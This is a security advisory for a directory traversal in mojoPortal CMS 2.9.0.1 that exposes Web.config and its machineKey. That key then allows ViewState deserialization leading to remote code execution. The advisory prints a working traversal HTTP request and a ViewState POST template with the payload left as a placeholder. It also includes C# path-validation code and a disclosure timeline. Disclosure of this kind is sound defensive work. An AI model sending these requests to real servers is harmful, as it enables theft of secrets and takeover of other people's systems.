Summary

A directory traversal vulnerability leading to ViewState deserialization was identified in mojoPortal CMS versions up to and including 2.9.0.1. By exploiting this issue, an unauthenticated attacker can read sensitive files within the web root directory, including the application's Web.config file. That configuration file contains the machineKey used to validate and decrypt ViewState data; with knowledge of this key, an adversary can craft a malicious ViewState payload that leads to remote code execution (RCE) on the underlying server.

Impact

By chaining the directory traversal and ViewState deserialization vulnerabilities, an unauthenticated adversary can achieve full remote code execution (RCE) on the hosting web server. The attacker downloads the Web.config file to extract the machineKey value, then sends a malicious ViewState payload to a vulnerable endpoint to execute arbitrary commands in the context of the IIS worker process.

Affected Software Version

The vulnerability was confirmed on version 2.9.0.1; earlier versions may also be affected.

Product Description

mojoPortal is an extensible, cross-database, mobile-friendly web content management system (CMS) and web application framework written in C# on ASP.NET.

Remediation

This issue was addressed in commit 8f8ce6a; the applied fix has not been validated.
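As an added illustration of the class of fix the remediation refers to (not mojoPortal's own code and not the contents of commit 8f8ce6a), the following C# shows the vulnerable join beside a path-containment check for a handler that serves files named by a "path" parameter. The gallery root directory used in Main is a constructed assumption.

```csharp
using System;
using System.IO;

// Added illustration (not mojoPortal's code or the 8f8ce6a fix): containing a
// user-supplied "path" parameter inside the gallery directory before serving it.
public static class GalleryPathGuard
{
    // The vulnerable shape: joining the parameter straight onto the root.
    // "../../../../Web.Config" walks out of the gallery directory, and a rooted
    // value such as @"C:\inetpub\site\Web.config" makes Path.Combine drop the root.
    public static string ResolveUnsafe(string galleryRoot, string requested)
        => Path.Combine(galleryRoot, requested);

    // Hardened: returns the canonical on-disk path if it stays under galleryRoot
    // and names an image file, otherwise null. galleryRoot must be absolute.
    public static string ResolveOrNull(string galleryRoot, string requested)
    {
        if (string.IsNullOrWhiteSpace(requested)) return null;
        try
        {
            string root = Path.GetFullPath(galleryRoot);
            if (!root.EndsWith(Path.DirectorySeparatorChar.ToString()))
                root += Path.DirectorySeparatorChar;

            // Refuse absolute input; only a relative name under the root is allowed.
            string rel = requested.Replace('/', Path.DirectorySeparatorChar);
            if (Path.IsPathRooted(rel)) return null;

            // GetFullPath collapses "." and ".." segments, so anything that escaped no
            // longer starts with root; the trailing separator stops "...\gallery2\x.jpg"
            // from passing as inside "...\gallery".
            string full = Path.GetFullPath(Path.Combine(root, rel));
            if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase)) return null;

            // Allow-list what the handler exists to serve; Web.config and source
            // files never qualify even when the path itself is in range.
            string ext = Path.GetExtension(full).ToLowerInvariant();
            if (Array.IndexOf(new[] { ".jpg", ".jpeg", ".png", ".gif" }, ext) < 0) return null;
            return full;
        }
        catch (ArgumentException) { return null; }     // invalid path characters
        catch (NotSupportedException) { return null; } // e.g. "C:foo" on .NET Framework
    }

    public static void Main()
    {
        string root = @"C:\inetpub\mojoportal\gallery"; // assumed location, constructed
        Console.WriteLine(ResolveUnsafe(root, @"..\..\Web.config"));
        Console.WriteLine(ResolveOrNull(root, @"..\..\Web.config") ?? "rejected");
        Console.WriteLine(ResolveOrNull(root, "album/photo.jpg") ?? "rejected");
    }
}
```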

Vulnerability

Directory Traversal

GET /api/BetterImageGallery/imagehandler?path=../../../../Web.Config HTTP/1.1
Host: mojoPortal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1

ViewState Deserialization

POST /Services/PayPalIPNHandler.aspx HTTP/1.1
Host: mojoPortal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=<PAYLOAD_HERE>&__VIEWSTATEGENERATOR=9AF84319&txn_id=TESTTRANSACTION123&custom=aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee&mc_gross=100.00&payment_status=Completed

Exploit

The exploit script can be found here.

Credit

Jake McCallum (@0xLanks)

Disclosure Timeline

  • 15th February 2025: Vulnerabilities discovered.
  • 15th February 2025: Disclosure of vulnerabilities to i7MEDIA.
  • 17th February 2025: CVE ID requested.
  • 19th February 2025: Contact made by i7MEDIA. Fixes implemented and committed to master branch.
  • 11th April 2025: CVE ID assigned.
  • 13th April 2025: Advisory released.